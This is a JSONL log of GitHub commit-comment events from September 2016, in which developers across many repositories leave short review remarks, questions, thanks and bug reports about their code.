{"id":"4618456298","type":"CommitCommentEvent","actor":{"login":"laughingowl"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19174195,"position":null,"line":null,"path":null,"commit_id":"dbbaa13c3d617f6908a4c14da3ba5920fbe3c2e9","created_at":"2016-09-26T15:16:50Z","updated_at":"2016-09-26T15:16:50Z","body":"Thrax,  while have to admit I have gotten in a bind once or twice there,  instant of removing them could we consider just moving them so they encircle the town, but perhaps more then 100m from atleast cloning and shuttle so not instant pain.  (or perhaps move some of the 'non-elders' to elders, seems like there lines forming to hunt elders already pulling these out completely going make it worse for the rest."}},"created_at":"2016-09-26T15:16:50Z"}
{"id":"4618457684","type":"CommitCommentEvent","actor":{"login":"TheoVerhelst"},"repo":{"name":"RobinPetit/BermudOS"},"payload":{"comment":{"id":19174199,"position":19,"line":104,"path":"boot/kernel.c","commit_id":"697041b1200fb5a0a8ae82eb2c5d34be0c64c112","created_at":"2016-09-26T15:17:02Z","updated_at":"2016-09-26T15:17:02Z","body":"What a fix."}},"created_at":"2016-09-26T15:17:02Z"}
{"id":"4618458022","type":"CommitCommentEvent","actor":{"login":"menshiyun"},"repo":{"name":"iceman1001/proxmark3"},"payload":{"comment":{"id":19174201,"position":null,"line":null,"path":null,"commit_id":"c3b6fdfa5b30ad77457a2bae99db69bcd09e2968","created_at":"2016-09-26T15:17:05Z","updated_at":"2016-09-26T15:17:05Z","body":"Thanks very much!"}},"created_at":"2016-09-26T15:17:05Z"}
{"id":"4618458650","type":"CommitCommentEvent","actor":{"login":"pixyzehn"},"repo":{"name":"nerdishbynature/git2go-translation"},"payload":{"comment":{"id":19174204,"position":null,"line":null,"path":null,"commit_id":"d5727286895e718cd904a33c118be9934ffe0018","created_at":"2016-09-26T15:17:11Z","updated_at":"2016-09-26T15:17:11Z","body":"```\r\n\"DOCUMENT_EXTENSION_UNZIP_CONFIRMATION_TITLE\" = \"このファイルを展開しますか?\";\r\n\"DOCUMENT_EXTENSION_UNZIP_CONFIRMATION_YES\" = \"はい\";\r\n\"DOCUMENT_EXTENSION_UNZIP_CONFIRMATION_NO\" = \"いいえ\";\r\n```\r\nI hope you would use these."}},"created_at":"2016-09-26T15:17:11Z"}
{"id":"4618460047","type":"CommitCommentEvent","actor":{"login":"ScallyBag"},"repo":{"name":"jromang/picochess"},"payload":{"comment":{"id":19174206,"position":null,"line":null,"path":null,"commit_id":"cbaba7ccfff8ef5981dbed7c8aac2bfa52657ced","created_at":"2016-09-26T15:17:24Z","updated_at":"2016-09-26T15:17:24Z","body":"Thanks Jürgen."}},"created_at":"2016-09-26T15:17:24Z"}
{"id":"4618460607","type":"CommitCommentEvent","actor":{"login":"nim65s"},"repo":{"name":"7Robot/TRR2016"},"payload":{"comment":{"id":19174208,"position":null,"line":null,"path":null,"commit_id":"dece811bd61b591cbdd973229bb861def09679c3","created_at":"2016-09-26T15:17:29Z","updated_at":"2016-09-26T15:17:29Z","body":"> On n’a jamais été aussi large\r\n– Every n7 club ever"}},"created_at":"2016-09-26T15:17:29Z"}
{"id":"4618463911","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19174213,"position":7,"line":22,"path":"initializr-web/src/test/groovy/io/spring/initializr/web/support/SpringBootMetadataReaderTests.groovy","commit_id":"13e6ec44314bc54075de0d13fc29a78271368cc9","created_at":"2016-09-26T15:18:01Z","updated_at":"2016-09-26T15:18:01Z","body":":( - I know the code style isn't formalized but could you please avoid breaking imports like that?"}},"created_at":"2016-09-26T15:18:01Z"}
{"id":"4618470626","type":"CommitCommentEvent","actor":{"login":"MarcusTwist"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19174227,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-26T15:19:04Z","updated_at":"2016-09-26T15:19:04Z","body":"Got it all installed and active but there is no 'C' button for capturing the glyphs? http://imgur.com/3L0Trtn\r\n\r\n(iPhone 5, iOS 8.3)\r\n"}},"created_at":"2016-09-26T15:19:04Z"}
{"id":"4618476608","type":"CommitCommentEvent","actor":{"login":"securedirective"},"repo":{"name":"Alofoxx/club-websystem"},"payload":{"comment":{"id":19174240,"position":null,"line":null,"path":null,"commit_id":"8d6984a749db1cf74c1a9158f9501190ab4dac95","created_at":"2016-09-26T15:20:02Z","updated_at":"2016-09-26T15:20:02Z","body":"Fixes #51, #55 "}},"created_at":"2016-09-26T15:20:02Z"}
{"id":"4618477567","type":"CommitCommentEvent","actor":{"login":"firegurafiku"},"repo":{"name":"actor-framework/actor-framework"},"payload":{"comment":{"id":19174242,"position":4,"line":53,"path":"configure","commit_id":"927542f62e12a53cf8e4f1bc1e3a674c8f9eab9e","created_at":"2016-09-26T15:20:11Z","updated_at":"2016-09-26T15:20:11Z","body":"@Neverlord \r\nBut for it the purpose of `--no-exception`? I cannot explain why, but I just feel like conditionally disabling exceptions is just so baad..."}},"created_at":"2016-09-26T15:20:11Z"}
{"id":"4618479364","type":"CommitCommentEvent","actor":{"login":"garyjo"},"repo":{"name":"parici/collegeboreal"},"payload":{"comment":{"id":19174243,"position":null,"line":null,"path":null,"commit_id":"3468324a11e392eeecc8715f5f88be6e8eb6ef9c","created_at":"2016-09-26T15:20:27Z","updated_at":"2016-09-26T15:20:27Z","body":"je cherche a faire le changement de pages "}},"created_at":"2016-09-26T15:20:27Z"}
{"id":"4618480365","type":"CommitCommentEvent","actor":{"login":"jonathasp6"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19174245,"position":21,"line":21,"path":"app/src/main/java/br/com/arctouch/rest/HttpRequestClient.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-26T15:20:37Z","updated_at":"2016-09-26T15:20:37Z","body":"good idea!"}},"created_at":"2016-09-26T15:20:37Z"}
{"id":"4618482666","type":"CommitCommentEvent","actor":{"login":"Vitallium"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19174246,"position":5,"line":19,"path":"Source/cmake/OptionsCommon.cmake","commit_id":"e60cf699beb095879ab07d1e35ea9e47ea1e833a","created_at":"2016-09-26T15:21:00Z","updated_at":"2016-09-26T15:21:00Z","body":"`USE_LD_GOLD` defined later in this file."}},"created_at":"2016-09-26T15:21:00Z"}
{"id":"4618483265","type":"CommitCommentEvent","actor":{"login":"jonathasp6"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19174248,"position":17,"line":17,"path":"app/src/main/java/br/com/arctouch/arctouchbus/RoutesAdapterList.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-26T15:21:05Z","updated_at":"2016-09-26T15:21:05Z","body":"I forgot to remove!"}},"created_at":"2016-09-26T15:21:05Z"}
{"id":"4618483867","type":"CommitCommentEvent","actor":{"login":"0000066666"},"repo":{"name":"rohanpawar959/xtremetrekkers"},"payload":{"comment":{"id":19174249,"position":null,"line":null,"path":null,"commit_id":"0306377d8d708dec6dc9636a9306bc5956006f5c","created_at":"2016-09-26T15:21:11Z","updated_at":"2016-09-26T15:21:11Z","body":"You should remove dropdown.onchange = onCatChange; for avoid any ambiguity in the program.\r\n"}},"created_at":"2016-09-26T15:21:11Z"}
{"id":"4618487789","type":"CommitCommentEvent","actor":{"login":"ChadRoesler"},"repo":{"name":"ChadRoesler/RichTextBox-Log4Net"},"payload":{"comment":{"id":19174257,"position":null,"line":null,"path":null,"commit_id":"b4c36ef521dce8b97e2aa38d3fe430006a32122e","created_at":"2016-09-26T15:21:46Z","updated_at":"2016-09-26T15:21:46Z","body":"Example for what should be added to the App.ConfigFile for the Appender"}},"created_at":"2016-09-26T15:21:46Z"}
{"id":"4618489562","type":"CommitCommentEvent","actor":{"login":"jessp855"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19174260,"position":null,"line":null,"path":null,"commit_id":"7597a52dbf7179106b4ebba928dc04efbe6a8c78","created_at":"2016-09-26T15:22:02Z","updated_at":"2016-09-26T15:22:02Z","body":"Hi Guys,\r\n\r\nIs there any fix update on this issue? I still encountered this issue on my magento 2.1.1\r\n\r\n"}},"created_at":"2016-09-26T15:22:02Z"}
{"id":"4618493714","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19174262,"position":null,"line":null,"path":null,"commit_id":"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e","created_at":"2016-09-26T15:22:40Z","updated_at":"2016-09-26T15:22:40Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#G77VVS3MRFqHpJMjpCfFqg"}},"created_at":"2016-09-26T15:22:40Z"}
{"id":"4618499386","type":"CommitCommentEvent","actor":{"login":"jonathasp6"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19174270,"position":85,"line":85,"path":"app/src/main/java/br/com/arctouch/arctouchbus/ArctouchBus.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-26T15:23:32Z","updated_at":"2016-09-26T15:23:32Z","body":"Good"}},"created_at":"2016-09-26T15:23:32Z"}
{"id":"4618499741","type":"CommitCommentEvent","actor":{"login":"Neverlord"},"repo":{"name":"actor-framework/actor-framework"},"payload":{"comment":{"id":19174272,"position":4,"line":53,"path":"configure","commit_id":"927542f62e12a53cf8e4f1bc1e3a674c8f9eab9e","created_at":"2016-09-26T15:23:35Z","updated_at":"2016-09-26T15:23:35Z","body":"@firegurafiku don't use it if you don't need it. Exceptions are simply a no-go in some environments (e.g. embedded devices)."}},"created_at":"2016-09-26T15:23:35Z"}
{"id":"4618504309","type":"CommitCommentEvent","actor":{"login":"0Xueying0"},"repo":{"name":"fromD/final"},"payload":{"comment":{"id":19174288,"position":null,"line":null,"path":null,"commit_id":"aa6d35f35a64d0f6cdd03a8b78edf58ef5cc856a","created_at":"2016-09-26T15:24:20Z","updated_at":"2016-09-26T15:24:20Z","body":"commit"}},"created_at":"2016-09-26T15:24:20Z"}
{"id":"4618507476","type":"CommitCommentEvent","actor":{"login":"GuaiYiHu"},"repo":{"name":"GuaiYiHu/android_device_meizu_arale"},"payload":{"comment":{"id":19174294,"position":null,"line":null,"path":null,"commit_id":"0f089fbc7be3f01456b20bc848b3597ba45c4071","created_at":"2016-09-26T15:24:51Z","updated_at":"2016-09-26T15:24:51Z","body":"This commit helps me a lot ! \r\nHave you ever meet \"java.util.zip.ZipException: error in opening zip file\r\n\tat java.util.zip.ZipFile.open(Native Method)\r\n\tat java.util.zip.ZipFile.<init>(ZipFile.java:219)\r\n\tat java.util.zip.ZipFile.<init>(ZipFile.java:149)\r\n\tat java.util.jar.JarFile.<init>(JarFile.java:166)\r\n\tat java.util.jar.JarFile.<init>(JarFile.java:145)\r\n\tat com.android.signapk.SignApk.main(SignApk.java:1107)\r\n\" ?\r\nAnd some class can not be found when compiling \"external/apache-http\".........Can you help me solve the problem? Thanks a lot, guy!"}},"created_at":"2016-09-26T15:24:51Z"}
{"id":"4618507634","type":"CommitCommentEvent","actor":{"login":"ChadRoesler"},"repo":{"name":"ChadRoesler/RichTextBox-Log4Net"},"payload":{"comment":{"id":19174295,"position":null,"line":null,"path":null,"commit_id":"6678d6df007af7d6b6442fec0739b9f4e56103bb","created_at":"2016-09-26T15:24:53Z","updated_at":"2016-09-26T15:24:53Z","body":"Example of how to call it in a form"}},"created_at":"2016-09-26T15:24:53Z"}
{"id":"4618509066","type":"CommitCommentEvent","actor":{"login":"Naatan"},"repo":{"name":"Komodo/KomodoEdit"},"payload":{"comment":{"id":19174298,"position":null,"line":null,"path":null,"commit_id":"d67cc172bf352719c36707007fe096d425742fa7","created_at":"2016-09-26T15:25:06Z","updated_at":"2016-09-26T15:25:06Z","body":"@twhiteman any chance you could give insight as to why this existed?"}},"created_at":"2016-09-26T15:25:06Z"}
{"id":"4618512315","type":"CommitCommentEvent","actor":{"login":"DarDar1"},"repo":{"name":"DarDar1/ooooo"},"payload":{"comment":{"id":19174308,"position":2,"line":2,"path":"README.md","commit_id":"8ae4b4c5946e4b51023f0c4cecd79250c02ea1ed","created_at":"2016-09-26T15:25:36Z","updated_at":"2016-09-26T15:25:36Z","body":"oooooo"}},"created_at":"2016-09-26T15:25:36Z"}
{"id":"4618512571","type":"CommitCommentEvent","actor":{"login":"GuaiYiHu"},"repo":{"name":"GuaiYiHu/android_device_meizu_arale"},"payload":{"comment":{"id":19174309,"position":null,"line":null,"path":null,"commit_id":"0f089fbc7be3f01456b20bc848b3597ba45c4071","created_at":"2016-09-26T15:25:38Z","updated_at":"2016-09-26T15:25:38Z","body":"This commit helps me a lot !\r\nHave you ever meet \"java.util.zip.ZipException: error in opening zip file\r\nat java.util.zip.ZipFile.open(Native Method)\r\nat java.util.zip.ZipFile.(ZipFile.java:219)\r\nat java.util.zip.ZipFile.(ZipFile.java:149)\r\nat java.util.jar.JarFile.(JarFile.java:166)\r\nat java.util.jar.JarFile.(JarFile.java:145)\r\nat com.android.signapk.SignApk.main(SignApk.java:1107)\r\n\" ?\r\nAnd some class can not be found when compiling \"external/apache-http\".........Can you help me solve the problem? Thanks a lot, guy!"}},"created_at":"2016-09-26T15:25:38Z"}
{"id":"4618514875","type":"CommitCommentEvent","actor":{"login":"Bloke"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19174311,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-26T15:26:02Z","updated_at":"2016-09-26T15:26:02Z","body":"Sweet, go for it."}},"created_at":"2016-09-26T15:26:02Z"}
{"id":"4618525050","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19174328,"position":5,"line":242,"path":"Tools/QtTestBrowser/qttestbrowser.cpp","commit_id":"e60cf699beb095879ab07d1e35ea9e47ea1e833a","created_at":"2016-09-26T15:27:39Z","updated_at":"2016-09-26T15:27:39Z","body":"QT_CONFIGURED_WITH_OPENGL is defined in Tools/QtTestBrowser/CMakeLists.txt"}},"created_at":"2016-09-26T15:27:39Z"}
{"id":"4618525691","type":"CommitCommentEvent","actor":{"login":"jonathasp6"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19174331,"position":114,"line":114,"path":"app/src/main/java/br/com/arctouch/arctouchbus/RouteDetails.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-26T15:27:45Z","updated_at":"2016-09-26T15:27:45Z","body":"Stops is the component's final text.  I'm just building this text in this case. I don't know other way."}},"created_at":"2016-09-26T15:27:45Z"}
{"id":"4618527068","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19174333,"position":5,"line":19,"path":"Source/cmake/OptionsCommon.cmake","commit_id":"e60cf699beb095879ab07d1e35ea9e47ea1e833a","created_at":"2016-09-26T15:27:57Z","updated_at":"2016-09-26T15:27:57Z","body":"ok, will fix myself"}},"created_at":"2016-09-26T15:27:57Z"}
{"id":"4618528277","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19174336,"position":41,"line":41,"path":"idea/src/org/jetbrains/kotlin/idea/refactoring/memberInfo/KotlinInterfaceMemberDependencyGraph.kt","commit_id":"dc7018af19d81bcc27fd5309bfee791e9b1a87ad","created_at":"2016-09-26T15:28:08Z","updated_at":"2016-09-26T15:28:08Z","body":"Better use the version with reified type parameter"}},"created_at":"2016-09-26T15:28:08Z"}
{"id":"4618530801","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19174341,"position":49,"line":49,"path":"idea/src/org/jetbrains/kotlin/idea/refactoring/memberInfo/KotlinInterfaceMemberDependencyGraph.kt","commit_id":"dc7018af19d81bcc27fd5309bfee791e9b1a87ad","created_at":"2016-09-26T15:28:29Z","updated_at":"2016-09-26T15:28:29Z","body":"Same here"}},"created_at":"2016-09-26T15:28:29Z"}
{"id":"4618533886","type":"CommitCommentEvent","actor":{"login":"0Xueying0"},"repo":{"name":"fromD/oop"},"payload":{"comment":{"id":19174344,"position":null,"line":null,"path":null,"commit_id":"39ff4418a529a797e794a75d334c0b8c15c3df63","created_at":"2016-09-26T15:28:58Z","updated_at":"2016-09-26T15:28:58Z","body":"i'm angry"}},"created_at":"2016-09-26T15:28:58Z"}
{"id":"4618534859","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesos/mesos-go"},"payload":{"comment":{"id":19174346,"position":24,"line":24,"path":"mesosproto/allocator.proto","commit_id":"7870a46fd9ad7d9d47dc518c46750c969c602bde","created_at":"2016-09-26T15:29:07Z","updated_at":"2016-09-26T15:29:07Z","body":"thanks for the suggestions. will investigate\n\nOn Sun, Sep 25, 2016 at 9:15 AM, Walter Schulze <notifications@github.com>\nwrote:\n\n> You could possibly use something as simple as protoc --gogoslick_out=. and\n> remove the complex proto_path, the import of gogo.proto and the options\n> enabled here.\n> https://github.com/gogo/protobuf#more-speed-and-more-generated-code\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mesos/mesos-go/commit/7870a46fd9ad7d9d47dc518c46750c969c602bde#commitcomment-19163567>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACPVLK_cys4sNq-f57qCAPu2-6Zwpc3Eks5qtnPugaJpZM4KF5i->\n> .\n>\n"}},"created_at":"2016-09-26T15:29:07Z"}
{"id":"4618537154","type":"CommitCommentEvent","actor":{"login":"dpostorivo"},"repo":{"name":"ThrowTheSwitch/Ceedling"},"payload":{"comment":{"id":19174348,"position":null,"line":null,"path":null,"commit_id":"61b3db601b8caf4e36145638a811e9f856cf6c76","created_at":"2016-09-26T15:29:26Z","updated_at":"2016-09-26T15:29:26Z","body":"@pennam The report is generated by the  running `rake utils:gcov` after running `rake gcov:all`. You should see \"Creating html report of gcov results...\" on your terminal and  GcovCoverageResults.html as an output where you run it when  you use `rake utils:gcov`. If you still run into issues, can you create a bug report detailing exact what happened?"}},"created_at":"2016-09-26T15:29:26Z"}
{"id":"4618543760","type":"CommitCommentEvent","actor":{"login":"jongerrish"},"repo":{"name":"robolectric/robolectric"},"payload":{"comment":{"id":19174358,"position":5,"line":437,"path":"robolectric-shadows/shadows-core/src/main/resources/org/robolectric/shadows/ShadowAssetManager.java.vm","commit_id":"e1909e92b31b24a14657c4a6f14566905fb29735","created_at":"2016-09-26T15:30:28Z","updated_at":"2016-09-26T15:30:28Z","body":"Would it be better to throw a Resources.NotFoundException here?"}},"created_at":"2016-09-26T15:30:28Z"}
{"id":"4618544385","type":"CommitCommentEvent","actor":{"login":"jlandon"},"repo":{"name":"ovenbits/ModelRocket"},"payload":{"comment":{"id":19174360,"position":8,"line":31,"path":"Sources/JSONTransformable.swift","commit_id":"a238a56d1ea5b24db7d573d2a4382a8890f01165","created_at":"2016-09-26T15:30:33Z","updated_at":"2016-09-26T15:30:33Z","body":"In order to maintain NSCoding support, I had to remove the generic constraint from the `JSONTransformable` protocol. This code from Property.swift\r\n```swift\r\nif let object = object as? JSONTransformable {\r\n   coder.encode(object.toJSON(), forKey: key)\r\n}\r\n```\r\nis not possible if the protocol contains a generic constraint. Can you post an example of where you're having trouble? `UIColor` conforms to `JSONTransformable`, and that's a non-final class, so could you do something similar to that?"}},"created_at":"2016-09-26T15:30:33Z"}
{"id":"4618553409","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19174384,"position":7,"line":22,"path":"initializr-web/src/test/groovy/io/spring/initializr/web/support/SpringBootMetadataReaderTests.groovy","commit_id":"13e6ec44314bc54075de0d13fc29a78271368cc9","created_at":"2016-09-26T15:32:00Z","updated_at":"2016-09-26T15:32:00Z","body":"I don't like wildcard imports either, so I'll remove them. But what else was the problem?"}},"created_at":"2016-09-26T15:32:00Z"}
{"id":"4618554836","type":"CommitCommentEvent","actor":{"login":"alexandr-san4ez"},"repo":{"name":"cmderdev/cmder"},"payload":{"comment":{"id":19174388,"position":null,"line":null,"path":null,"commit_id":"9c0ad9fd8139809f612a73d8a51d840be05794ea","created_at":"2016-09-26T15:32:12Z","updated_at":"2016-09-26T15:32:12Z","body":"I think git process must close.\r\n`file:close()` - make it."}},"created_at":"2016-09-26T15:32:12Z"}
{"id":"4618557123","type":"CommitCommentEvent","actor":{"login":"gadgetsgalaxy"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19174394,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-26T15:32:34Z","updated_at":"2016-09-26T15:32:34Z","body":"Hi thanks for the great work! Waiting for the release. xD only source code uploaded."}},"created_at":"2016-09-26T15:32:34Z"}
{"id":"4618558326","type":"CommitCommentEvent","actor":{"login":"BOT-Man-JL"},"repo":{"name":"BOT-Man-JL/EggAche-GL"},"payload":{"comment":{"id":19174395,"position":null,"line":null,"path":null,"commit_id":"60aa6e009534345e1381872760411ca70640100b","created_at":"2016-09-26T15:32:44Z","updated_at":"2016-09-26T15:32:44Z","body":"#13 "}},"created_at":"2016-09-26T15:32:44Z"}
{"id":"4618561778","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19174407,"position":6,"line":518,"path":"cura/BuildVolume.py","commit_id":"8e07a94d685e7d155a63c740592a319a3da24729","created_at":"2016-09-26T15:33:16Z","updated_at":"2016-09-26T15:33:16Z","body":"While Travel Avoid distance is indeed called `travel_avoid_distance` ((see here)[https://github.com/Ultimaker/Cura/blob/master/resources/definitions/fdmprinter.def.json#L2148]), Infill Wipe Distance is abbreviated to `infill_wipe_dist`: (see here)[https://github.com/Ultimaker/Cura/blob/master/resources/definitions/fdmprinter.def.json#L1018]."}},"created_at":"2016-09-26T15:33:16Z"}
{"id":"4618562405","type":"CommitCommentEvent","actor":{"login":"mdanilkis"},"repo":{"name":"mambu-gmbh/Mambu-APIs-Java"},"payload":{"comment":{"id":19174411,"position":24,"line":342,"path":"src/com/mambu/apisdk/services/LinesOfCreditService.java","commit_id":"313e14e75f3ab36f6e198a830d6d95b378f9ea14","created_at":"2016-09-26T15:33:22Z","updated_at":"2016-09-26T15:33:22Z","body":"I suggest we can specify just one parameter, lineOfCredit object, and then verify and take either the encoded key or id from it (whichever is not null, like in patchLoanAccount(LoanAccount loan))."}},"created_at":"2016-09-26T15:33:22Z"}
{"id":"4618563862","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19174419,"position":null,"line":null,"path":null,"commit_id":"ef6b18c28a7951f646150b22aa3369096eac8172","created_at":"2016-09-26T15:33:36Z","updated_at":"2016-09-26T15:33:36Z","body":"The Mesopotamian gods may either be due to restoration or left-overs that can be ignored."}},"created_at":"2016-09-26T15:33:36Z"}
{"id":"4618565633","type":"CommitCommentEvent","actor":{"login":"agarwal"},"repo":{"name":"biocaml/biocaml"},"payload":{"comment":{"id":19174424,"position":null,"line":null,"path":null,"commit_id":"ca7cb5807527e80a59e689cd5d417023f19bd9c1","created_at":"2016-09-26T15:33:52Z","updated_at":"2016-09-26T15:33:52Z","body":"> For some reason, if I open Biocaml_base.Std and use the Fasta module afterwards, ocamlbuild complains about circular dependencies\r\n\r\nThat's because `ocamldep` isn't very smart. It doesn't do a precise analysis to determine the full paths of module names. We likely have to extend solvuu-build to allow users to override the automatic dependency analysis. Apparently, ocp-build also has such a feature as mentioned on [caml-list](https://sympa.inria.fr/sympa/arc/caml-list/2016-07/msg00146.html)."}},"created_at":"2016-09-26T15:33:52Z"}
{"id":"4618572636","type":"CommitCommentEvent","actor":{"login":"mdanilkis"},"repo":{"name":"mambu-gmbh/Mambu-APIs-Java"},"payload":{"comment":{"id":19174440,"position":null,"line":null,"path":null,"commit_id":"313e14e75f3ab36f6e198a830d6d95b378f9ea14","created_at":"2016-09-26T15:34:57Z","updated_at":"2016-09-26T15:34:57Z","body":"Looks great to me!"}},"created_at":"2016-09-26T15:34:57Z"}
{"id":"4618580679","type":"CommitCommentEvent","actor":{"login":"sf-jonstewart"},"repo":{"name":"strozfriedberg/liblightgrep"},"payload":{"comment":{"id":19174470,"position":12,"line":80,"path":"src/lib/program.cpp","commit_id":"462324d5ab4258d4d734cd276cd44489ba179cb4","created_at":"2016-09-26T15:36:17Z","updated_at":"2016-09-26T15:36:17Z","body":"can you put the assignment to `end` on a separate line? I think this cruft is from a time when these operands were relaxed somehow."}},"created_at":"2016-09-26T15:36:17Z"}
{"id":"4618580811","type":"CommitCommentEvent","actor":{"login":"cristina-david"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19174472,"position":52,"line":167,"path":"src/cbmc/bmc_cover.cpp","commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-26T15:36:18Z","updated_at":"2016-09-26T15:36:18Z","body":"I've made covered_goals a set in order to ensure sortedness."}},"created_at":"2016-09-26T15:36:18Z"}
{"id":"4618589051","type":"CommitCommentEvent","actor":{"login":"dustingetz"},"repo":{"name":"luke-brown/luke-brown.github.io"},"payload":{"comment":{"id":19174489,"position":5,"line":5,"path":"anatomy.md","commit_id":"2707056ae47169452a9662c2ce1d057a71c1075e","created_at":"2016-09-26T15:37:41Z","updated_at":"2016-09-26T15:37:41Z","body":"Made me think of lambda calculus, which defines the term \"lambda abstraction\" specifically (just means \"functions\" - you can plot them like in math and not have to think about their insides unless you want to, and the key to this is of course referential transparency). I hear http://haskellbook.com/ has a great first chapter about lambda calculus"}},"created_at":"2016-09-26T15:37:41Z"}
{"id":"4618589225","type":"CommitCommentEvent","actor":{"login":"dustingetz"},"repo":{"name":"luke-brown/luke-brown.github.io"},"payload":{"comment":{"id":19174490,"position":13,"line":13,"path":"anatomy.md","commit_id":"2707056ae47169452a9662c2ce1d057a71c1075e","created_at":"2016-09-26T15:37:43Z","updated_at":"2016-09-26T15:37:43Z","body":"i might argue that objects don't separate idea from implementation, but functions do, if you can figure out how to express the idea as a function. Makes me think of our conversation in the car where you spoke of naming object interfaces and how interfaces have more than one thing (what makes a Map? it can assoc, dissoc, get). Can you express the idea of a Map as a function? Kind of you can - y=f(x) is a **map**ping of x->y, but we lost assoc/dissoc. perhaps this is telling us that assoc and dissoc are not part of the fundamental idea here, they are different abstractions? interface is a set of abstractions? Just riffing here. in category theory, assoc and dissoc are binary operators like \"add\" or \"concat\", and the name of the abstraction for binary operator is Semigroup i think, and i think these ideas can all be expressed in lambda calculus."}},"created_at":"2016-09-26T15:37:43Z"}
{"id":"4618589442","type":"CommitCommentEvent","actor":{"login":"dustingetz"},"repo":{"name":"luke-brown/luke-brown.github.io"},"payload":{"comment":{"id":19174492,"position":15,"line":15,"path":"anatomy.md","commit_id":"2707056ae47169452a9662c2ce1d057a71c1075e","created_at":"2016-09-26T15:37:45Z","updated_at":"2016-09-26T15:37:45Z","body":"\"programmable machine\" -> interpreter, i like this, also makes me think of lambda calculus interpreters"}},"created_at":"2016-09-26T15:37:45Z"}
{"id":"4618589625","type":"CommitCommentEvent","actor":{"login":"dustingetz"},"repo":{"name":"luke-brown/luke-brown.github.io"},"payload":{"comment":{"id":19174495,"position":17,"line":17,"path":"anatomy.md","commit_id":"2707056ae47169452a9662c2ce1d057a71c1075e","created_at":"2016-09-26T15:37:47Z","updated_at":"2016-09-26T15:37:47Z","body":"> expression `A AND B` binds the abstract realm of propositional logic onto some particular mechanical specification\r\n\r\nbut does it? if `and` is logical and, or bitwise and, these have formal definitions  independent from the machine execution. If different machines evaluate `A AND B` to different results, that is a problem with the machine. Today's machines of course have this problem - they run out of memory, or they consume too much power - but math doesn't have this problem, you can evaluate it in your brain, or the universe can evaluate it since the universe is already an interpreter.\r\n\r\nIf the code is math then we don't have to think about the second level anymore. This is what functional programming means to me (even though today's languages don't quite get there, we are getting closer)"}},"created_at":"2016-09-26T15:37:47Z"}
{"id":"4618589834","type":"CommitCommentEvent","actor":{"login":"dustingetz"},"repo":{"name":"luke-brown/luke-brown.github.io"},"payload":{"comment":{"id":19174496,"position":21,"line":21,"path":"anatomy.md","commit_id":"2707056ae47169452a9662c2ce1d057a71c1075e","created_at":"2016-09-26T15:37:49Z","updated_at":"2016-09-26T15:37:49Z","body":"i dont think software needs hardware, software is just math and math was a thing before computers"}},"created_at":"2016-09-26T15:37:49Z"}
{"id":"4618590092","type":"CommitCommentEvent","actor":{"login":"dustingetz"},"repo":{"name":"luke-brown/luke-brown.github.io"},"payload":{"comment":{"id":19174497,"position":25,"line":25,"path":"anatomy.md","commit_id":"2707056ae47169452a9662c2ce1d057a71c1075e","created_at":"2016-09-26T15:37:51Z","updated_at":"2016-09-26T15:37:51Z","body":"- i think the von neuman architecture (imperative) is the source of accidental complexity, there are other archiectures such as Lisp Machine\r\n-- http://c2.com/cgi/wiki?CanProgrammingBeLiberatedFromTheVonNeumannStyle\r\n-- http://worrydream.com/refs/Backus-CanProgrammingBeLiberated.pdf\r\n- the \"code is data\" philosophy as i understand it, is about macros, no abstraction, don't understand what you're saying here"}},"created_at":"2016-09-26T15:37:51Z"}
